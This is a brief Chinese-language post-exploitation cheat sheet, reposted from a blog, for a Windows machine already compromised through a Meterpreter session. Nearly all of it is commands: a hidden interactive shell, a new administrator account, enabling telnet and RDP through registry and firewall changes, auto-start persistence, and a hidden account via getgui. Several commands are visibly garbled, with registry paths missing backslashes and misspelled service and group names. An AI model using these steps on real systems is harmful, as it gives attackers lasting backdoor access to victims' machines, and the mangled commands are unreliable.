概述
1.获得meterpreter回话
2.execute -H -f cmd -i 执行时,创建一个交互命令shell(-i),该shell充当隐藏的进程(-H)。
3.创建用户 C: net use Service_Account password /add
C: net localgroup administrator Service_Accountt /add
4.开启telnet run gettelnet -e
启用远程Windows 终端服务
在交换式shell中修改注册表
C: reg add "hklmsystemcurrentControlSetControlTerminalServer" /v "AllowTSConnections" /t REG_DWORD /d 0*1 /f
C: reg add "hklmsystemcurrentControlSetControlTerminalServer" /v "fDenyTSConnections" /t REG_DWORD /d 0*0 /f
为了确保RDP协议能够通过客户端的防火墙。添加一条规则:
C: netshadvfirewall firewall set rule group =" remote desktop" new enable=Yes
开启RDP服务:
C: net start Terservice
这样启动没有持久性。开机自启:
C: sc configTermService start=auto
创建隐藏账户:
run getgui -u Service_Account -p pa$$word
转载于:https://www.cnblogs.com/pangya/p/7940720.html
最后
以上就是感性小鸭子为你收集整理的获得shell 、启用远程服务的全部内容,希望文章能够帮你解决获得shell 、启用远程服务所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复